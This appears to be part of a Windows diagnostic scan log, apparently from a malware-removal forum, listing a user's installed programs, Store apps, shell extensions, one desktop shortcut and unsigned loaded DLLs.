Malwarebytes version 4.1.0.56 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.1.0.56 - Malwarebytes)
Microsoft .NET Core SDK 3.1.201 (x64) from Visual Studio (HKLM\...\{AE0BA5F1-D63A-4784-944F-114B82FB8202}) (Version: 3.1.201.015034 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\OneDriveSetup.exe) (Version: 19.232.1124.0012 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2019 CTP2.2 (HKLM\...\{8D7CE3B0-5379-46FE-9F4B-A65D9F4CC1F1}) (Version: 15.0.1200.24 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2019 CTP2.2 (HKLM-x32\...\{725CC962-98BD-42C7-87D8-51C680FB1779}) (Version: 15.0.1200.24 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 2.5.2061.411 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{E15F69FA-660D-45CC-B28F-6CBC4CAD2091}) (Version: 1.0.0.0 - Mojang)
MSI Development Tools (HKLM-x32\...\{DB4DB790-64DD-1902-4BF2-833B3B6DBCA1}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.8.4 - Notepad++ Team)
NVIDIA Graphics Driver 436.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 436.15 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.38.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.21 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.19.0218 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.19.0218 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 23.2.1 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.12624.20442 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.12624.20466 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.12624.20442 - Microsoft Corporation) Hidden
Python 3.6.0 Add to Path (64-bit) (HKLM\...\{5A3CA177-8304-4D59-A44D-6A60032725E4}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Core Interpreter (64-bit) (HKLM\...\{1944B5D6-0FFB-47C0-BFEC-5C7A2F013FA7}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Development Libraries (64-bit) (HKLM\...\{A6A3184B-748E-46F4-9E28-6B5889506170}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Documentation (64-bit) (HKLM\...\{5D83032F-36B5-42E4-A114-D310119C6F51}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Executables (64-bit) (HKLM\...\{C0016766-8F63-4992-9E6F-ECFB2CB12BA6}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 pip Bootstrap (64-bit) (HKLM\...\{F9C1C892-4908-41F4-900C-7B0DAAF2387B}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Standard Library (64-bit) (HKLM\...\{F3CB2257-C4C7-4C84-AF63-BADCED1E3273}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Tcl/Tk Support (64-bit) (HKLM\...\{E24AA157-AD52-42ED-B484-CA5979D4A728}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Test Suite (64-bit) (HKLM\...\{631C7E77-5832-40D1-9D6D-7B3766D79BDF}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Utility Scripts (64-bit) (HKLM\...\{FE905DA4-0F23-4F99-9284-50BB4913CEB4}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.8.2 Add to Path (32-bit) (HKLM-x32\...\{D09DF89B-E013-43F8-8ED8-6D6B9D4A1CDA}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Core Interpreter (32-bit) (HKLM-x32\...\{6BA6203C-85AB-4B9E-8582-CE31B1B5C0ED}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Development Libraries (32-bit) (HKLM-x32\...\{12B4F371-ACE2-435B-BCF1-623F36C4E176}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Documentation (32-bit) (HKLM-x32\...\{45CEE0C6-5BB2-4A8B-B83C-58559A1CA424}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Executables (32-bit) (HKLM-x32\...\{FE5BE50D-21D5-44FB-9A97-5010E68608DA}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 pip Bootstrap (32-bit) (HKLM-x32\...\{2E818780-AC79-4BC0-8023-C1CC46EAC9B6}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Standard Library (32-bit) (HKLM-x32\...\{09CC0C6D-0822-491E-A10E-2A8443DDF170}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Tcl/Tk Support (32-bit) (HKLM-x32\...\{B1528EAE-7E64-49DB-8CE1-514EB30BB38B}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Test Suite (32-bit) (HKLM-x32\...\{EE21EEE7-9D5A-4ECE-B60F-4BFA63BDA937}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Utility Scripts (32-bit) (HKLM-x32\...\{E284B869-7701-4A91-82C2-D3E66974A0F9}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Roblox Player for ntbea (HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\roblox-player) (Version:  - Roblox Corporation)
SDK ARM Additions (HKLM-x32\...\{73681F86-CD86-4208-572F-959B45430B04}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{67EE3804-9642-62BA-EBF1-B1561FB4ECBE}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Shotcut (HKLM-x32\...\Shotcut) (Version: 19.09.14 - Meltytech, LLC)
Tracktion 7 (HKLM\...\Tracktion 7) (Version: 7.2.1.0 - Tracktion Software Corp.)
Unity (HKLM-x32\...\Unity) (Version: 2018.4.17f1 - Unity Technologies ApS)
Unity Hub 2.2.2 (HKLM\...\Unity Technologies - Hub) (Version: 2.2.2 - Unity Technologies Inc.)
Universal CRT Extension SDK (HKLM-x32\...\{13952D7A-B7B3-F4F8-5F29-5CD18E8168B7}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{74CBC330-ED16-31B9-E8BE-0C6A8E67DE32}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{847D4DAF-0182-265B-324F-406462E8A90D}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{54FE4D23-11A2-F1C4-76E9-79C8FB40A4A1}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{9F7B0D96-881D-8850-C303-43F3A08E6902}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{6F54BF87-2EE6-FA6D-431D-33A665992D49}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
vcpp_crt.redist.clickonce (HKLM-x32\...\{6B25D94A-4B50-45E2-BBD3-54E68700E1BC}) (Version: 14.25.28508 - Microsoft Corporation) Hidden
Visual Studio Community 2019 (HKLM-x32\...\8cf2634f) (Version: 16.5.30011.22 - Microsoft Corporation)
VS Immersive Activate Helper (HKLM-x32\...\{78500789-0EBE-4490-BE43-F9EF8250BF42}) (Version: 16.0.98.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4137D3AB-5B44-4AC9-83A4-5273F2E2547E}) (Version: 16.0.98.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{D8B26CBD-15D2-440B-BCBD-5616D74EFC7D}) (Version: 16.0.98.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{B5E3A3E1-1529-4D5A-9E95-34971FA07825}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{BAF91847-0A64-405E-98EC-A0BA6FB4BC4E}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{271F1F42-B547-4498-825F-590DBB1774F7}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{30D97A69-3C0F-4552-9A72-60E591B210C7}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{FDC38876-AD68-4616-942D-AC3194DAB0A3}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{95E79BBC-97FD-4FEB-91B5-CC0231324812}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{AD0C92A4-1514-4BC1-A723-A272A8343924}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{7DB17E2A-450D-4DBD-9C17-545A95804B0C}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{C309FC3D-20C2-4F48-AF46-E59674774602}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{692A0FB3-E6A2-4D41-AC03-4136B4312DC0}) (Version: 16.3.29209 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{ABBD10CA-0CFA-4D76-B033-F76C55A54336}) (Version: 16.4.29411 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{E47B4703-2337-4ED0-BA24-3EC08D643684}) (Version: 16.4.29411 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{27B16914-BC5D-4018-8074-071262A27F6D}) (Version: 16.2.28917 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{4D33D909-B071-41D2-B305-96B8586F911E}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{EC04CD66-C03A-470D-B0D2-4BBC87F6382D}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{0A54CADD-CBA1-4BC9-A134-6C9F91F41B9A}) (Version: 16.5.29521 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{E208E682-50EE-4F2F-9860-C91B906B8A03}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{8E3AE0EF-D067-700C-BDB4-10D5552155DC}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Windows SDK AddOn (HKLM-x32\...\{E6F877A1-2F65-4BF0-87B6-A4071B7663D3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.18362.1 (HKLM-x32\...\{126dedf0-cc0e-4b48-9ece-806b0e437195}) (Version: 10.1.18362.1 - Microsoft Corporation)
WinRAR 5.71 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.71.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{E67F1F03-FB4A-3D61-8999-E6A4C4B26F34}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{7EF010FF-7800-28BA-FF49-2D219EC7BA82}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{36AE12FB-4349-6EAA-B6E4-5F4E06FA8AE8}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{6B03A6A4-643C-57CE-CA6F-4E19BF47497A}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{918A448F-59E8-FBF5-B087-D3F07160C7E0}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{66483041-F590-EC46-4AF0-EE39C62FB680}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{9C61E6D2-C43E-6746-B519-6185558C4A24}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{6B37CC5B-78DF-5050-2215-68479716A587}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{250D5341-0879-4016-399C-BBCD87B80E95}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_110.1.728.0_x64__v10z8vjag6ke6 [2020-04-15] (HP Inc.)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-08-28] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-08-28] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.4030.0_x64__8wekyb3d8bbwe [2020-04-15] (Microsoft Studios) [MS Ad]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.14.6005.0_x64__8wekyb3d8bbwe [2020-04-22] (Microsoft Studios)
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-25] (Microsoft Corporation) [MS Ad]
Photos Add-on -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2019-09-07] (Microsoft Corporation)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-09-07] (Microsoft Corporation)
Pixel Art Studio -> C:\Program Files\WindowsApps\58815Gritsenko.PixelArtStudio_2.26.149.0_x64__7w3b3zxd8ve1p [2019-10-03] (Gritsenko)
ROBLOX -> C:\Program Files\WindowsApps\ROBLOXCORPORATION.ROBLOX_2.428.7790.0_x86__55nm5eh3cm0pr [2020-04-17] (ROBLOX Corporation)
Xbox Insider Hub -> C:\Program Files\WindowsApps\Microsoft.FlightDashboard_469.2003.9001.0_x64__8wekyb3d8bbwe [2020-04-21] (Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-230749707-3925018352-439227168-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\ntbea\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20031.2\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-230749707-3925018352-439227168-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\ntbea\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20031.2\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2020-01-29] (Notepad++ -> )
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2020-03-17] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-08-24] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\ntbea\Desktop\The3EyedGamer - (The3EyedGamer - Exploits) - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 6"
==================== Loaded Modules (Whitelisted) =============
2019-08-27 17:12 - 2019-08-27 17:12 - 000237568 _____ () [File not signed] C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\LEDControl.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000017920 _____ () [File not signed] C:\Program Files\AMD\CNext\CNext\libEGL.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 003567616 _____ () [File not signed] C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2018-03-13 04:47 - 2018-03-13 04:47 - 000912896 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-core.dll
2018-03-13 04:47 - 2018-03-13 04:47 - 003109888 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-s3.dll
2015-02-19 01:13 - 2015-02-19 01:13 - 000817152 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\Device.dll
2015-02-19 01:13 - 2015-02-19 01:13 - 003650560 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\Platform.dll
2019-06-19 13:25 - 2019-06-19 13:25 - 000209920 _____ () [File not signed] C:\Program Files\ENE\Aac_ENE RGB HAL\x86\AacHal_x86.dll
2018-03-20 17:34 - 2018-03-20 17:34 - 000265728 _____ () [File not signed] C:\Program Files\ENE\Aac_ENE RGB HAL\x86\SB_SMBUS_SDK.dll
2019-06-12 18:42 - 2019-06-12 18:42 - 000195584 _____ () [File not signed] C:\Program Files\ENE\Aac_ENE_EHD_HAL\AacHal_x86.dll
2020-03-17 17:01 - 2020-03-17 17:01 - 001518592 _____ (Advanced Micro Devices, Inc.) [File not signed] C:\Program Files\AMD\WVR\OpenVR\bin\win64\driver_amdwvr.dll
2019-05-23 18:48 - 2019-05-23 18:48 - 000471040 _____ (asmedia) [File not signed] C:\Program Files\ENE\Aac_ENE_EHD_HAL\asmtusb.dll
2019-08-27 17:10 - 2018-04-25 21:30 - 000240128 _____ (A-Volute) [File not signed] C:\Program Files (x86)\MSI\Dragon Center\Nahimic\NahimicAPI.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000031744 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qgif.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000039424 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qicns.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000031744 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qico.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000413696 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qjpeg.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000025088 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qsvg.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000025088 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qtga.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000023552 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qwbmp.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000519168 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qwebp.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 001431040 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\platforms\qwindows.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 001180672 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\sqldrivers\qsqlite.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000135680 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\styles\qwindowsvistastyle.dll
2020-03-17 17:10 - 2020-03-17 17:10 - 006010880 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Core.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 006345216 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Gui.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 001078272 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Network.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000313856 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Positioning.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 004000256 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Qml.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 003802624 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Quick.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000171008 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5QuickControls2.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 001083904 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5QuickTemplates2.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000205312 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Sql.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000329728 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Svg.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000113152 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebChannel.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000376320 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebEngine.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 092323328 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebEngineCore.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 005560832 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Widgets.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000463360 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WinExtras.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000188416 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Xml.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 002888704 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5XmlPatterns.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000053760 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000059392 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\qtgraphicaleffectsplugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000017408 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000287232 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls.2\qtquickcontrols2plugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000329216 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000136192 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000089088 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000312320 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Templates.2\qtquicktemplates2plugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000017920 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2020-03-17 17:10 - 2020-03-17 17:10 - 000085504 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtWebEngine\qtwebengineplugin.dll
